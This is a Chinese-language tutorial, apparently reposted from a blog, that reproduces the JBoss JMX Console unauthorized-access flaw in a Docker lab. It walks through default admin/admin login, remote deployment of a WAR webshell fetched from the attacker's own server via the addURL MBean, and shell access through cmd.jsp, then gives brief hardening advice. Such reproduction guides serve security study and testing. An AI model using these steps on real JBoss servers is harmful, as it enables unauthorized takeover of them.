Jboss历史漏洞利用 - JMX Console 未授权访问漏洞

这篇具有很好参考价值的文章主要介绍了Jboss历史漏洞利用 - JMX Console 未授权访问漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

环境搭建

docker搭建操作指南

docker search testjboss

docker pull testjboss/jboss

docker run -p 8085:8080 -d testjboss/jboss

jboss部署webshell,漏洞复现,docker,安全,java,web安全,网络

docker ps 

#查看是否搭建成功

jboss部署webshell,漏洞复现,docker,安全,java,web安全,网络

进行访问,出现以下界面即可搭建成功

jboss部署webshell,漏洞复现,docker,安全,java,web安全,网络

漏洞简介

Jboss的webUI界面 http://ip:port/jmx-console 未授权访问(或默认密码 admin/admin ),可导致JBoss的部署管理的信息泄露,攻击者也可以直接上传木马获取 webshell

jboss部署webshell,漏洞复现,docker,安全,java,web安全,网络

漏洞发现

访问

http://xx.xx.xx.xx/jmx-console/

如果可以直接访问或者通过默认账号密码登录则存在对应漏洞

jboss部署webshell,漏洞复现,docker,安全,java,web安全,网络

漏洞利用

远程部署war包

找到 jboss.deployment 选项 (jboss自带的部署功能)中的 flavor=URL,type=DeploymentScanner点进去(通过 url 的方式远程部署)

jboss部署webshell,漏洞复现,docker,安全,java,web安全,网络

也可以直接输入以下URL进入:

http://ip:port/jmx-console/HtmlAdaptor?
action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL

进入页面后找到 void addURL()

jboss部署webshell,漏洞复现,docker,安全,java,web安全,网络

在自己的vps上面部署远程的war木马,让目标机器请求我们的木马文件

jar -cvf shell.war jsp木马文件

python3 -m http.server
#python 开启http服务

jboss部署webshell,漏洞复现,docker,安全,java,web安全,网络

jboss部署webshell,漏洞复现,docker,安全,java,web安全,网络

在浏览器访问地址,获得war包路径。

jboss部署webshell,漏洞复现,docker,安全,java,web安全,网络

然后点击 Invoke 部署

jboss部署webshell,漏洞复现,docker,安全,java,web安全,网络

点击 Back to Agent View ,找到 jboss.web.deployment,查看是否上传成功

jboss部署webshell,漏洞复现,docker,安全,java,web安全,网络

jboss部署webshell,漏洞复现,docker,安全,java,web安全,网络

jboss部署webshell,漏洞复现,docker,安全,java,web安全,网络

GET SHELL

访问地址:http://ip:port/cmd/cmd.jsp , 输入木马的访问密码即可拿到服务器权限文章来源地址https://www.toymoban.com/news/detail-539947.html

防护建议

对jmx-console和web-console界面访问增加强认证。

关闭jmx-console和web-console,提高安全性。

到了这里,关于Jboss历史漏洞利用 - JMX Console 未授权访问漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • JBoss安装并部署war包

    JBOSS是一个免费的开放源代码的Web应用服务器,技术先进、性能稳定,而且免费,将Tomcat内核作为其Servlet容器引擎,并加以审核和调优。 解决Tomcat的一些欠缺: 如活动连接支持、静态内容、大文件和HTTPS等。除了性能问题, Tomcat是受限的集成平台,仅能运行Java应用程序。在

    2024年02月04日
    浏览(30)
  • Redis未授权访问漏洞引出的漏洞利用方式

    redis未授权访问漏洞是一个由于redis服务版本较低其未设置登录密码导致的漏洞,攻击者可直接利用redis服务器的ip地址和端口完成redis服务器的远程登录,对目标服务器完成后续的控制和利用。 redis版本为 4.x/5.0.5 或以前的版本; redis绑定在0.0.0.0:6379,且没有进行添加防火墙规

    2024年02月14日
    浏览(43)
  • 谨防利用Redis未授权访问漏洞入侵服务器

    Redis是一个开源的,由C语言编写的高性能NoSQL数据库,因其高性能、可扩展、兼容性强,被各大小互联网公司或个人作为内存型存储组件使用。 但是其中有小部分公司或个人开发者,为了方便调试或忽略了安全风险,直接用root启动redis,没有设置密码并直接对外开放了6379端口

    2024年02月05日
    浏览(41)
  • 第60天-服务攻防-中间件安全&CVE 复现&Weblogic&&Jboss&Jenkins&GlassFish

    文章仅供学习交流,一些漏洞没能复现出来(菜就多练),日后来兴趣再补坑(大概~) 视频链接:  【小迪安全】红蓝对抗 | 网络攻防 | V2022全栈培训_哔哩哔哩_bilibili https://www.bilibili.com/video/BV1pQ4y1s7kH 目录 一、知识点 1、中间件-Weblogic-CVE 2、中间件-JBoos-CVE 3、中间件-Jenkin

    2024年02月19日
    浏览(39)
  • Netty是一个由JBOSS提供的开源Java框架,目前已经成为Github上的独立项目

    Netty是一个由JBOSS提供的开源Java框架,目前已经成为Github上的独立项目。它提供了一个异步、事件驱动的网络应用程序框架和工具,用于快速开发高性能、高可靠性的网络服务器和客户端程序。 Netty是一个基于NIO的客户、服务器端的编程框架,使用Netty可以确保快速和简单地开

    2024年01月16日
    浏览(52)
  • Web漏洞-未授权访问漏洞

    未授权访问漏洞 漏洞介绍: 未授权访问漏洞就是在不需要请求授权的情况下对需要授权的功能进行访问执行,通常是由于认证页面存在缺陷,安全配置不当。 漏洞原理: 未授权访问是系统对用户的限制不全,或者无限制,可以让用户或者限制访问的用户,访问到内部的敏感

    2024年02月16日
    浏览(37)
  • springboot未授权漏洞(漏洞复现Springboot未授权访问及修复)

    Actuator 的核心是端点 Endpoint,它用来监视应用程序及交互,spring-boot-actuator 中已经内置了非常多的Endpoint(health、info、beans、metrics、httptrace、shutdown等等),同时也允许我们自己扩展自己的Endpoints。每个 Endpoint 都可以启用和禁用。要远程访问 Endpoint,还必须通过 JMX 或 HTTP 进

    2024年02月05日
    浏览(49)
  • 漏洞名称:RMI 未授权访问漏洞

    漏洞描述:RMI默认使用序列化来完成所有的交互,如果该端口暴露在公网上,且使用了Apache Commons Collections的漏洞版本,就可以在该服务器上执行相关命令。 漏洞危害:攻击者可在没有认证的情况下直接操作对应的 API 接口,可直接被非法增删改次数据。且因为攻击是在未认证下

    2024年02月06日
    浏览(36)
  • 漏洞——Elasticsearch未授权访问漏洞(原理扫描)

    下载地址: https://github.com/huhublog/elasticsearch7-http-basic 注意:如果下载的是zip,则需要在本地使用idea进行打包编译为jar,然后上传到服务器的elasticsearch安装目录下的 plugins / http-basic 目录下 里面需要配置文件plugin-descriptor.properties 配置 elasticsearch.yml 然后重启es进行 测试: 或

    2024年02月12日
    浏览(43)
  • Elasticsearch未授权访问漏洞

    对一个IP进行C段扫描时,发现了一台服务器存在Elasticsearch未授权访问漏洞 ElasticSearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。Elasticsearch是用Java开发的,并作为Apache许可条款下的开放源码发布,是当前流行的企业级搜

    2024年02月12日
    浏览(44)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包